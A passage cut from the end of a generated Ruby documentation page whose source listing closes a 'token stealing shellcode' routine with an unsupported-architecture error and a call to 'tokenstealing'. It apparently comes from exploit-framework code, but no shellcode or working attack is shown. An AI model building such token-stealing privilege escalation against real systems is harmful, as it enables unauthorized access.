</span> <span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Unsupported arch for token stealing shellcode</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail'>fail</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Invalid arch</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:09 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink